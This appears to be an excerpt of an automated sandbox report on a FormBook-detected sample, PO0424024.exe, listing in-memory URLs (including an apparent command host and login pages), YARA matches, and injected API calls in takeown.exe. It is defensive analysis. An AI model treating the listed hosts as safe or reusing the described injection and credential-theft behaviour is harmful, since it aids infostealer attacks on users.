Source: PO0424024.exe, 00000000.00000002.1733639364.0000000006942000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: PO0424024.exe, 00000000.00000002.1733639364.0000000006942000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: PO0424024.exe, 00000000.00000002.1733639364.0000000006942000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: PO0424024.exe, 00000000.00000002.1733639364.0000000006942000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: PO0424024.exe, 00000000.00000002.1733639364.0000000006942000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: PO0424024.exe, 00000000.00000002.1733639364.0000000006942000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: PO0424024.exe, 00000000.00000002.1733639364.0000000006942000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: PO0424024.exe, 00000000.00000002.1733639364.0000000006942000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: PO0424024.exe, 00000000.00000002.1733639364.0000000006942000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: PO0424024.exe, 00000000.00000002.1733639364.0000000006942000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: PO0424024.exe, 00000000.00000002.1733639364.0000000006942000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: PO0424024.exe, 00000000.00000002.1733639364.0000000006942000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: PO0424024.exe, 00000000.00000002.1733639364.0000000006942000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: PO0424024.exe, 00000000.00000002.1733639364.0000000006942000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: PO0424024.exe, 00000000.00000002.1733639364.0000000006942000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: PO0424024.exe, 00000000.00000002.1733639364.0000000006942000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: PO0424024.exe, 00000000.00000002.1733639364.0000000006942000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: tAFcdstzdUTfkmQlByDmlLl.exe, 00000006.00000002.4174754197.0000000006614000.00000004.80000000.00040000.00000000.sdmp, takeown.exe, 00000007.00000002.4171352067.0000000004124000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2456443722.000000000EFB4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.marksmile.com/asset/lp_qrcode.png
Source: tAFcdstzdUTfkmQlByDmlLl.exe, 00000006.00000002.4174754197.0000000006614000.00000004.80000000.00040000.00000000.sdmp, takeown.exe, 00000007.00000002.4171352067.0000000004124000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2456443722.000000000EFB4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.marksmile.com/asset/lp_style.css
Source: PO0424024.exe, 00000000.00000002.1733639364.0000000006942000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: PO0424024.exe, 00000000.00000002.1733538993.00000000050D0000.00000004.00000020.00020000.00000000.sdmp, PO0424024.exe, 00000000.00000002.1733639364.0000000006942000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: PO0424024.exe, 00000000.00000002.1733639364.0000000006942000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: tAFcdstzdUTfkmQlByDmlLl.exe, 00000006.00000002.4176035041.00000000086E0000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.threesomeapps.com
Source: tAFcdstzdUTfkmQlByDmlLl.exe, 00000006.00000002.4176035041.00000000086E0000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.threesomeapps.com/pq0o/
Source: PO0424024.exe, 00000000.00000002.1733639364.0000000006942000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: PO0424024.exe, 00000000.00000002.1733639364.0000000006942000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: PO0424024.exe, 00000000.00000002.1733639364.0000000006942000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: PO0424024.exe, 00000000.00000002.1733639364.0000000006942000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: takeown.exe, 00000007.00000002.4172934336.0000000007FE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: takeown.exe, 00000007.00000002.4172934336.0000000007FE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: takeown.exe, 00000007.00000002.4172934336.0000000007FE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: takeown.exe, 00000007.00000002.4172934336.0000000007FE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: takeown.exe, 00000007.00000002.4172934336.0000000007FE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: takeown.exe, 00000007.00000002.4172934336.0000000007FE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: takeown.exe, 00000007.00000002.4172934336.0000000007FE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: takeown.exe, 00000007.00000002.4171352067.0000000004F46000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://fasthosts.co.uk/
Source: tAFcdstzdUTfkmQlByDmlLl.exe, 00000006.00000002.4174754197.00000000067A6000.00000004.80000000.00040000.00000000.sdmp, tAFcdstzdUTfkmQlByDmlLl.exe, 00000006.00000002.4174754197.0000000007112000.00000004.80000000.00040000.00000000.sdmp, takeown.exe, 00000007.00000002.4172750176.0000000006530000.00000004.00000800.00020000.00000000.sdmp, takeown.exe, 00000007.00000002.4171352067.0000000004C22000.00000004.10000000.00040000.00000000.sdmp, takeown.exe, 00000007.00000002.4171352067.00000000042B6000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://img.sedoparking.com/templates/images/hero_nc.svg
Source: tAFcdstzdUTfkmQlByDmlLl.exe, 00000006.00000002.4174754197.0000000006614000.00000004.80000000.00040000.00000000.sdmp, takeown.exe, 00000007.00000002.4171352067.0000000004124000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2456443722.000000000EFB4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://lf6-cdn-tos.bytecdntp.com/cdn/expire-1-M/axios/0.26.0/axios.min.js
Source: takeown.exe, 00000007.00000002.4158156382.00000000031AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: takeown.exe, 00000007.00000002.4158156382.00000000031AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: takeown.exe, 00000007.00000002.4158156382.00000000031AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf
Source: takeown.exe, 00000007.00000002.4158156382.00000000031AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: takeown.exe, 00000007.00000002.4158156382.00000000031AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srfd
Source: takeown.exe, 00000007.00000002.4158156382.00000000031AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: takeown.exe, 00000007.00000002.4158156382.000000000317E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: takeown.exe, 00000007.00000003.2348545654.0000000007FC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: tAFcdstzdUTfkmQlByDmlLl.exe, 00000006.00000002.4174754197.0000000006614000.00000004.80000000.00040000.00000000.sdmp, takeown.exe, 00000007.00000002.4171352067.0000000004124000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2456443722.000000000EFB4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://mail.365.com/login.html
Source: tAFcdstzdUTfkmQlByDmlLl.exe, 00000006.00000002.4174754197.0000000007436000.00000004.80000000.00040000.00000000.sdmp, takeown.exe, 00000007.00000002.4171352067.0000000004F46000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://static.fasthosts.co.uk/icons/favicon.ico
Source: PO0424024.exe	String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
Source: takeown.exe, 00000007.00000002.4172934336.0000000007FE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: tAFcdstzdUTfkmQlByDmlLl.exe, 00000006.00000002.4174754197.0000000007436000.00000004.80000000.00040000.00000000.sdmp, takeown.exe, 00000007.00000002.4171352067.0000000004F46000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.fasthosts.co.uk/contact?utm_source=domainparking&utm_medium=referral&utm_campaign=fh_par
Source: tAFcdstzdUTfkmQlByDmlLl.exe, 00000006.00000002.4174754197.0000000007436000.00000004.80000000.00040000.00000000.sdmp, takeown.exe, 00000007.00000002.4171352067.0000000004F46000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.fasthosts.co.uk/domain-names/search/?domain=$
Source: tAFcdstzdUTfkmQlByDmlLl.exe, 00000006.00000002.4174754197.0000000007436000.00000004.80000000.00040000.00000000.sdmp, takeown.exe, 00000007.00000002.4171352067.0000000004F46000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.fasthosts.co.uk/get-online?utm_source=domainparking&utm_medium=referral&utm_campaign=fh_
Source: tAFcdstzdUTfkmQlByDmlLl.exe, 00000006.00000002.4174754197.00000000072A4000.00000004.80000000.00040000.00000000.sdmp, takeown.exe, 00000007.00000002.4171352067.0000000004DB4000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.fastmail.help/hc/en-us/articles/1500000280141
Source: tAFcdstzdUTfkmQlByDmlLl.exe, 00000006.00000002.4174754197.00000000072A4000.00000004.80000000.00040000.00000000.sdmp, takeown.exe, 00000007.00000002.4171352067.0000000004DB4000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.fastmailusercontent.com/filestorage/css/main.css
Source: tAFcdstzdUTfkmQlByDmlLl.exe, 00000006.00000002.4174754197.0000000007436000.00000004.80000000.00040000.00000000.sdmp, takeown.exe, 00000007.00000002.4171352067.0000000004F46000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-199510482-1
Source: tAFcdstzdUTfkmQlByDmlLl.exe, 00000006.00000002.4174754197.0000000006614000.00000004.80000000.00040000.00000000.sdmp, takeown.exe, 00000007.00000002.4171352067.0000000004124000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2456443722.000000000EFB4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.marksmile.com/
Source: tAFcdstzdUTfkmQlByDmlLl.exe, 00000006.00000002.4174754197.0000000007112000.00000004.80000000.00040000.00000000.sdmp, takeown.exe, 00000007.00000002.4172750176.0000000006530000.00000004.00000800.00020000.00000000.sdmp, takeown.exe, 00000007.00000002.4171352067.0000000004C22000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.namecheap.com/domains/registration/results/?domain=kakaobrain.us
Source: tAFcdstzdUTfkmQlByDmlLl.exe, 00000006.00000002.4174754197.00000000067A6000.00000004.80000000.00040000.00000000.sdmp, takeown.exe, 00000007.00000002.4171352067.00000000042B6000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.namecheap.com/domains/registration/results/?domain=luckydomainz.shop
Source: takeown.exe, 00000007.00000002.4171352067.00000000042B6000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.sedo.com/services/parking.php3

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 2.2.PO0424024.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.PO0424024.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.4170807354.00000000034D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2174491857.00000000012C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4170764124.0000000003490000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4157652949.0000000002F00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4176035041.0000000008660000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2172226006.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2174679636.0000000001470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4170805786.0000000002800000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 2.2.PO0424024.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.PO0424024.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000002.4170807354.00000000034D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.2174491857.00000000012C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000002.4170764124.0000000003490000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000002.4157652949.0000000002F00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.4176035041.0000000008660000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.2172226006.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.2174679636.0000000001470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.4170805786.0000000002800000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_0042B263 NtClose,	2_2_0042B263
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FA35C0 NtCreateMutant,LdrInitializeThunk,	2_2_00FA35C0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FA2B60 NtClose,LdrInitializeThunk,	2_2_00FA2B60
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FA2C70 NtFreeVirtualMemory,LdrInitializeThunk,	2_2_00FA2C70
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FA2DF0 NtQuerySystemInformation,LdrInitializeThunk,	2_2_00FA2DF0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FA3090 NtSetValueKey,	2_2_00FA3090
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FA3010 NtOpenDirectoryObject,	2_2_00FA3010
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FA4340 NtSetContextThread,	2_2_00FA4340
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FA4650 NtSuspendThread,	2_2_00FA4650
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FA39B0 NtGetContextThread,	2_2_00FA39B0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FA2AF0 NtWriteFile,	2_2_00FA2AF0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FA2AD0 NtReadFile,	2_2_00FA2AD0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FA2AB0 NtWaitForSingleObject,	2_2_00FA2AB0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FA2BF0 NtAllocateVirtualMemory,	2_2_00FA2BF0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FA2BE0 NtQueryValueKey,	2_2_00FA2BE0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FA2BA0 NtEnumerateValueKey,	2_2_00FA2BA0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FA2B80 NtQueryInformationFile,	2_2_00FA2B80
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FA2CF0 NtOpenProcess,	2_2_00FA2CF0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FA2CC0 NtQueryVirtualMemory,	2_2_00FA2CC0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FA2CA0 NtQueryInformationToken,	2_2_00FA2CA0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FA2C60 NtCreateKey,	2_2_00FA2C60
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FA2C00 NtQueryInformationProcess,	2_2_00FA2C00
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FA2DD0 NtDelayExecution,	2_2_00FA2DD0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FA2DB0 NtEnumerateKey,	2_2_00FA2DB0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FA3D70 NtOpenThread,	2_2_00FA3D70
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FA2D30 NtUnmapViewOfSection,	2_2_00FA2D30
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FA2D10 NtMapViewOfSection,	2_2_00FA2D10
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FA3D10 NtOpenProcessToken,	2_2_00FA3D10
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FA2D00 NtSetInformationFile,	2_2_00FA2D00
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FA2EE0 NtQueueApcThread,	2_2_00FA2EE0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FA2EA0 NtAdjustPrivilegesToken,	2_2_00FA2EA0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FA2E80 NtReadVirtualMemory,	2_2_00FA2E80
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FA2E30 NtWriteVirtualMemory,	2_2_00FA2E30
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FA2FE0 NtCreateFile,	2_2_00FA2FE0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FA2FB0 NtResumeThread,	2_2_00FA2FB0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FA2FA0 NtQuerySection,	2_2_00FA2FA0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FA2F90 NtProtectVirtualMemory,	2_2_00FA2F90
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FA2F60 NtCreateProcessEx,	2_2_00FA2F60
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FA2F30 NtCreateSection,	2_2_00FA2F30
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_03784340 NtSetContextThread,LdrInitializeThunk,	7_2_03784340
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_03784650 NtSuspendThread,LdrInitializeThunk,	7_2_03784650
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_03782B60 NtClose,LdrInitializeThunk,	7_2_03782B60
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_03782BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	7_2_03782BF0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_03782BE0 NtQueryValueKey,LdrInitializeThunk,	7_2_03782BE0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_03782BA0 NtEnumerateValueKey,LdrInitializeThunk,	7_2_03782BA0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_03782AF0 NtWriteFile,LdrInitializeThunk,	7_2_03782AF0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_03782AD0 NtReadFile,LdrInitializeThunk,	7_2_03782AD0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_03782F30 NtCreateSection,LdrInitializeThunk,	7_2_03782F30
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_03782FE0 NtCreateFile,LdrInitializeThunk,	7_2_03782FE0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_03782FB0 NtResumeThread,LdrInitializeThunk,	7_2_03782FB0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_03782EE0 NtQueueApcThread,LdrInitializeThunk,	7_2_03782EE0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_03782E80 NtReadVirtualMemory,LdrInitializeThunk,	7_2_03782E80
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_03782D30 NtUnmapViewOfSection,LdrInitializeThunk,	7_2_03782D30
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_03782D10 NtMapViewOfSection,LdrInitializeThunk,	7_2_03782D10
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_03782DF0 NtQuerySystemInformation,LdrInitializeThunk,	7_2_03782DF0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_03782DD0 NtDelayExecution,LdrInitializeThunk,	7_2_03782DD0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_03782C70 NtFreeVirtualMemory,LdrInitializeThunk,	7_2_03782C70
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_03782C60 NtCreateKey,LdrInitializeThunk,	7_2_03782C60
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_03782CA0 NtQueryInformationToken,LdrInitializeThunk,	7_2_03782CA0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_037835C0 NtCreateMutant,LdrInitializeThunk,	7_2_037835C0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_037839B0 NtGetContextThread,LdrInitializeThunk,	7_2_037839B0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_03782B80 NtQueryInformationFile,	7_2_03782B80
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_03782AB0 NtWaitForSingleObject,	7_2_03782AB0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_03782F60 NtCreateProcessEx,	7_2_03782F60
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_03782FA0 NtQuerySection,	7_2_03782FA0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_03782F90 NtProtectVirtualMemory,	7_2_03782F90
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_03782E30 NtWriteVirtualMemory,	7_2_03782E30
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_03782EA0 NtAdjustPrivilegesToken,	7_2_03782EA0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_03782D00 NtSetInformationFile,	7_2_03782D00
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_03782DB0 NtEnumerateKey,	7_2_03782DB0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_03782C00 NtQueryInformationProcess,	7_2_03782C00
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_03782CF0 NtOpenProcess,	7_2_03782CF0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_03782CC0 NtQueryVirtualMemory,	7_2_03782CC0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_03783010 NtOpenDirectoryObject,	7_2_03783010
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_03783090 NtSetValueKey,	7_2_03783090
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_03783D70 NtOpenThread,	7_2_03783D70
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_03783D10 NtOpenProcessToken,	7_2_03783D10
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_02F27AD0 NtReadFile,	7_2_02F27AD0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_02F27BB0 NtDeleteFile,	7_2_02F27BB0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_02F27970 NtCreateFile,	7_2_02F27970
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_02F27C50 NtClose,	7_2_02F27C50
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 7_2_02F27DA0 NtAllocateVirtualMemory,	7_2_02F27DA0

Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 0_2_0257DFE4	0_2_0257DFE4
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 0_2_04CC6E40	0_2_04CC6E40
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 0_2_04CC0589	0_2_04CC0589
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 0_2_04CC0598	0_2_04CC0598
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 0_2_04CC6E33	0_2_04CC6E33
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 0_2_04D97684	0_2_04D97684
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 0_2_04D9BC28	0_2_04D9BC28
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 0_2_071004B8	0_2_071004B8
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 0_2_071001A0	0_2_071001A0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 0_2_07107C10	0_2_07107C10
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 0_2_0710B568	0_2_0710B568
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 0_2_071004A8	0_2_071004A8
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 0_2_0710B130	0_2_0710B130
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 0_2_07101139	0_2_07101139
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 0_2_07101148	0_2_07101148
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 0_2_07100190	0_2_07100190
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 0_2_07103F50	0_2_07103F50
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 0_2_07103FB0	0_2_07103FB0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 0_2_07103FA1	0_2_07103FA1
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 0_2_0710CC10	0_2_0710CC10
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 0_2_07107C09	0_2_07107C09
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 0_2_0710ACF8	0_2_0710ACF8
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 0_2_07102A48	0_2_07102A48
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 0_2_07102A80	0_2_07102A80
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 0_2_0710A8C0	0_2_0710A8C0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 0_2_071F12A0	0_2_071F12A0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_0040E04A	2_2_0040E04A
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_0040E053	2_2_0040E053
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00401114	2_2_00401114
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00402920	2_2_00402920
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00401120	2_2_00401120
